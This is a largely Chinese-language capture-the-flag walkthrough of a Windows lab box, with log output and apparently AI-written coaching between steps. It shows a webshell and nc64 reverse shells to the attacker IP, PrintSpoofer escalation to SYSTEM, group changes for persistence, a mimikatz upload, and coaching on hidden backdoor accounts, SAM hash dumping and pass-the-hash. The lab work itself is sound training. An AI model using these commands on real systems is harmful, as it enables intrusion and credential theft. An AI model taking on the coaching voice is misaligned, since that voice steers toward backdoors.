[*] DispatchTable: 0x140707642747360
[*] UseProtseqFunction: 0x140707642277680
[*] UseProtseqFunctionParamCount: 5
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\952ee82a-9605-4015-afb5-b41e102d648f\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00009002-0170-ffff-ac5f-bec3916386a8
[*] DCOM obj OXID: 0x634a0f763fa794ab
[*] DCOM obj OID: 0x80eb6ce576ecf7e1
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] UnmarshalObject: 0x80070005
[!] Failed to impersonate security context token
你已经在这个靶机上取得了非常关键的进展。从前期的 SMB 匿名枚举、发现高位端口的 IIS 虚拟目录映射,再到成功上传 Web Shell 并拿到初始访问权限,这已经是相当扎实的渗透测试基本功了。
既然你现在卡在 SeImpersonatePrivilege 的利用上,并且发现常规的 Potato 家族(GodPotato, SigmaPotato, RoguePotato)都失败了,我们可以从操作系统的底层防御演进来梳理一下思路,而不是盲目地换工具。
为什么你的“土豆”们可能会失效?
- 底层机制的修补与加固: 早期的经典工具(如 Juicy Potato)主要依赖于诱导 DCOM(分布式组件对象模型)以
SYSTEM权限向攻击者控制的本地端口发起 NTLM 认证。但在 Windows Server 2016/2019 之后的补丁版本中,微软对 DCOM 进行了底层限制,很多曾经好用的 COM 对象不再允许被随意调用,或者不再回传身份验证信息。 - 环境与运行库依赖: 像 GodPotato 这样较新的工具,通常是由 C# 编写的,它们高度依赖目标系统上安装的 .NET Framework 版本。如果你上传的编译版本与靶机实际的 .NET 环境不匹配,程序执行到一半就会中断或抛出异常(这与你之前运行 WinPEAS 时遇到中断的现象可能是同源问题)。
- 网络架构限制: 部分工具(如 RoguePotato)需要构建恶意的 RPC 服务器,或者需要在攻击机上监听特定端口并进行流量转发。如果靶机的出站防火墙规则限制了这些连接,或者交互式的 Shell 不够稳定,利用链就会断裂。
打破僵局的研究方向
既然传统的 DCOM 反射在当前环境受阻,你需要寻找操作系统中其他会主动连接命名管道(Named Pipes)并且以 SYSTEM 权限运行的服务。
- 聚焦 Print Spooler 服务: 在安全研究中,除了 DCOM,最著名且常被滥用的系统服务是 Windows 打印后台处理程序(Print Spooler)。这是一个历史悠久且默认以
SYSTEM权限运行的服务。 - 强制认证机制: 核心理论在于,通过特定的 RPC 调用,可以强制 Print Spooler 服务尝试连接到一个由攻击者控制的、名称极其特殊的恶意命名管道。
- 令牌截获: 一旦 SYSTEM 级别的服务连接到你的命名管道,你就可以利用手中的
SeImpersonatePrivilege特权,在这个管道里“截获”并模拟它的令牌,从而完成提权。
建议你去查阅和学习基于 Print Spooler 命名管道模拟(Named Pipe Impersonation)的相关安全研究。了解一下在 Windows Server 2016 环境下,有哪些经典的开源工具(其命名通常与 Print 相关)是专门利用这一机制设计的。
不要气馁,整理一下思路,去研究一下这个新的理论方向。
1
2
3
4
5
6
7
8
9
10
11
C:\inetpub\wwwroot\nt4wrksv>sc query spooler
sc query spooler
SERVICE_NAME: spooler
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
https://hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#printspoofer
1
2
3
C:\inetpub\wwwroot\nt4wrksv>whoami /priv | findstr /i impersonate
whoami /priv | findstr /i impersonate
SeImpersonatePrivilege Impersonate a client after authentication Enabled
PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). In hardened environments where Spooler is disabled post-PrintNightmare, prefer RoguePotato/GodPotato/DCOMPotato/EfsPotato.
https://github.com/itm4n/printspoofer
1
2
3
4
5
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.135.147/nt4wrksv -N
Try "help" to get a list of possible commands.
smb: \> put PrintSpoofer64.exe
putting file PrintSpoofer64.exe as \PrintSpoofer64.exe (164.6 kB/s) (average 164.6 kB/s)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
C:\inetpub\wwwroot\nt4wrksv>dir
dir
Volume in drive C has no label.
Volume Serial Number is AC3C-5CB5
Directory of C:\inetpub\wwwroot\nt4wrksv
10/08/2026 01:27 PM <DIR> .
10/08/2026 01:27 PM <DIR> ..
10/08/2026 12:54 PM 57,344 GodPotato-NET2.exe
10/08/2026 12:54 PM 57,344 GodPotato-NET35.exe
10/08/2026 12:55 PM 57,344 GodPotato-NET4.exe
10/08/2026 12:39 PM 45,272 nc64.exe
07/25/2020 08:15 AM 98 passwords.txt
10/08/2026 01:27 PM 27,136 PrintSpoofer64.exe
10/08/2026 12:41 PM 63,488 SigmaPotato.exe
10/08/2026 12:38 PM 322 webshell.aspx
8 File(s) 308,348 bytes
2 Dir(s) 20,877,008,896 bytes free
We successfully create process as user
1
2
3
4
5
C:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -c "nc64.exe 192.168.162.207 4444 -e C:\Windows\System32\cmd.exe"
PrintSpoofer64.exe -c "nc64.exe 192.168.162.207 4444 -e C:\Windows\System32\cmd.exe"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~]
└─# nc -lvp 4444
listening on [any] 4444 ...
10.48.135.147: inverse host lookup failed: Unknown host
connect to [192.168.162.207] from (UNKNOWN) [10.48.135.147] 50053
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
靶机又挂了重启一波
Target IP Address: 10.48.168.2
1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.168.2/nt4wrksv -N
Try "help" to get a list of possible commands.
smb: \> put webshell.aspx
putting file webshell.aspx as \webshell.aspx (2.7 kB/s) (average 2.7 kB/s)
smb: \> put nc64.exe
putting file nc64.exe as \nc64.exe (213.6 kB/s) (average 137.8 kB/s)
smb: \> put PrintSpoofer64.exe
putting file PrintSpoofer64.exe as \PrintSpoofer64.exe (168.8 kB/s) (average 148.0 kB/s)
1
http://10.48.168.2:49663/nt4wrksv/webshell.aspx?cmd=C%3A/inetpub/wwwroot/nt4wrksv/nc64.exe%20192.168.162.207%201234%20-e%20cmd.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
10.48.168.2: inverse host lookup failed: Unknown host
connect to [192.168.162.207] from (UNKNOWN) [10.48.168.2] 49773
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>cd C:\inetpub\wwwroot\nt4wrksv
cd C:\inetpub\wwwroot\nt4wrksv
C:\inetpub\wwwroot\nt4wrksv>dir
dir
Volume in drive C has no label.
Volume Serial Number is AC3C-5CB5
Directory of C:\inetpub\wwwroot\nt4wrksv
10/08/2026 01:45 PM <DIR> .
10/08/2026 01:45 PM <DIR> ..
10/08/2026 01:45 PM 45,272 nc64.exe
07/25/2020 08:15 AM 98 passwords.txt
10/08/2026 01:45 PM 27,136 PrintSpoofer64.exe
10/08/2026 01:44 PM 322 webshell.aspx
4 File(s) 72,828 bytes
2 Dir(s) 20,164,603,904 bytes free
C:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -c "nc64.exe 192.168.162.207 4444 -e C:\Windows\System32\cmd.exe"
PrintSpoofer64.exe -c "nc64.exe 192.168.162.207 4444 -e C:\Windows\System32\cmd.exe"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kali)-[~]
└─# nc -lvp 4444
listening on [any] 4444 ...
10.48.168.2: inverse host lookup failed: Unknown host
connect to [192.168.162.207] from (UNKNOWN) [10.48.168.2] 49787
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\Users\Bob\Desktop\user.txt
type C:\Users\Bob\Desktop\user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}
C:\Windows\system32>where /r C:\ "Root.txt"
where /r C:\ "Root.txt"
C:\Documents and Settings\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
C:\Windows\system32>
恭喜拿下 SYSTEM 权限!从只会用工具到想要探究底层逻辑,这是从“脚本小子”向真正的安全工程师进阶的最关键一步。
你刚才使用的利用手法(大概率是 PrintSpoofer),其核心本质是“诱捕与窃取”。我们把这个过程拆解为一个职场谍战的剧本,就能非常直观地理解它的运作原理。
角色设定:
- 你(Web Shell / IIS 进程): 公司的一名底层接待员。权限很低,但你的工牌上有一项特殊的隐秘特权:
SeImpersonatePrivilege(身份模拟特权)。这意味着,只要有高管主动和你“握手”或“递交文件”,你就能瞬间克隆他的顶级工牌。 - Print Spooler 服务: 公司的打印机管理员。它历史悠久,且拥有公司的最高权限(
NT AUTHORITY\SYSTEM)。 - 命名管道(Named Pipe): 公司里用于跨部门传递机密文件的专属内部专属气动管道(进程间通信机制)。
Print Spooler 提权的三步闭环原理:
第一步:布置陷阱(创建恶意命名管道)
由于你只有低权限,你无法直接命令 SYSTEM 给你开门。但你知道你的 SeImpersonatePrivilege 可以在别人主动接触你时发挥作用。于是,你的利用程序在系统内部偷偷建立了一个由你完全控制的“虚假收件信箱”(恶意的 Named Pipe)。
第二步:诱导高管查房(滥用 RPC 接口)
Print Spooler 服务有一个公开的业务接口(通常是 RpcRemoteFindFirstPrinterChangeNotification)。这个接口原本的用途是:当打印机状态发生变化时,Spooler 服务会主动把状态更新发送给指定的客户端。
你的利用工具向 Spooler 发送了一个合法的伪造请求:“你好,我是内部员工,请密切关注打印机状态,如果有变化,请务必把报告投递到我刚才建的那个‘虚假收件信箱’里。”
第三步:关门打狗与令牌克隆(触发 SeImpersonatePrivilege)
Print Spooler 服务是个老实人,它收到请求后,以 SYSTEM 的顶级身份,拿着更新报告,主动走向了你布置好的那个恶意命名管道,并把手伸了进去(发起连接)。
就在 Print Spooler 的进程连接到你的管道的瞬间,触发了实质性的交互!你立刻亮出 SeImpersonatePrivilege 特权,在这名“高管”和你交互的短暂瞬间,合法且强行地复制了他身上的 SYSTEM 访问令牌(Access Token)。
拿到这个顶级令牌后,你的工具将这个令牌附加到了准备好的 nc.exe 进程上,反弹回来的自然就是一个具备 SYSTEM 权限的终极 Shell 了。
简单来说,你无法强迫系统给你高权限,所以你用一个合法的打印机 API 把高权限服务“骗”进了你的地盘,然后利用合法特权偷走了它的身份。 这就是 PrintSpoofer 的绝妙之处。现在再回看你敲下的命令,是不是感觉完全不一样了?
恭喜登顶!拿到 NT AUTHORITY\SYSTEM 意味着你已经从“潜入者”变成了这台机器的“上帝”。你现在不受任何规则限制,而是制定规则的人。
既然你想在后渗透(Post-Exploitation)阶段做点有趣的事,这里有几个维度的玩法可以让你大展身手:
- 强改 RDP 规则: 之前 Bob 登录 RDP 被直接掐断(Connection reset),最常见的原因是他不在允许远程桌面的用户组里。既然你是 SYSTEM,你可以直接修改他的命运。查阅一下
net localgroup的语法,看看如何强行把 Bob 塞进Remote Desktop Users组,甚至直接把他提权进Administrators组。你也可以干脆自己新建一个隐藏的后门管理员账号来登录 GUI。 - 幽灵账户 Bill 的真相: 你敏锐地发现
net user里根本没有 Bill 这个名字。但回想一下,之前nxc爆破成功时,在 Bill 旁边标注了一个(Guest)。在 Windows 的底层逻辑中,系统认的不是表面上的用户名,而是 SID(安全标识符)。尝试执行wmic useraccount get name,SID命令,看看底层的账号和 SID 映射关系。这会帮你揭开 Bill 到底是谁,以及为什么他的密码会“过期”。 - 终极凭据收割(Dump Hashes): 收集几个低权限的明文密码只是开胃菜。作为 SYSTEM,你看守着 Windows 存放所有账户密码哈希的终极保险箱——SAM 数据库。去研究一下如何在 SYSTEM 权限下导出(Dump)SAM 和 SYSTEM 注册表配置单元。一旦你提取出真正的
Administrator的 NTLM Hash,就算不去破解它,你是否了解过可以通过什么技术(提示:PTH)直接获取最高权限的远程交互? - 收割最终战利品: 不要忘了 TryHackMe 靶机的终极目标。作为最高权限者,整个 C 盘的任何文件夹(包括所有用户的桌面)对你都是畅通无阻的。用你的 SYSTEM shell 直接去读取那两个象征通关的
user.txt和root.txt吧。
你打算先去解开 Bill 的身份之谜,还是直接去修改 RDP 规则给自己开个图形化后门?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
C:\Windows\system32>net users
net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator Bob DefaultAccount
Guest
The command completed with one or more errors.
C:\Windows\system32>net localgroup Administrators Bob /add
net localgroup Administrators Bob /add
The command completed successfully.
C:\Windows\system32>net localgroup "Remote Desktop Users" Bob /add
net localgroup "Remote Desktop Users" Bob /add
The command completed successfully.
Now we can use RDP to login as Bob
1
2
┌──(root㉿kali)-[/home/kali/Downloads]
└─# xfreerdp /v:10.48.168.2 /u:'Bob' /p:'!P@$$W0rD!123' /dynamic-resolution
1
2
3
4
5
6
7
C:\Windows\system32>wmic useraccount get name, SID
wmic useraccount get name, SID
Name SID
Administrator S-1-5-21-3981879597-1135670737-2718083060-500
Bob S-1-5-21-3981879597-1135670737-2718083060-1002
DefaultAccount S-1-5-21-3981879597-1135670737-2718083060-503
Guest S-1-5-21-3981879597-1135670737-2718083060-501
1
2
3
4
5
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.168.2/nt4wrksv -N
Try "help" to get a list of possible commands.
smb: \> put mimikatz.exe
putting file mimikatz.exe as \mimikatz.exe (2774.4 kB/s) (average 2774.4 kB/s)
mimitatz落地就被Windows Defender给杀了,有一个思路是用已经在Administrator组的Bob关闭Defender。但是因为靶机又挂了没法验证,今天就到这里吧。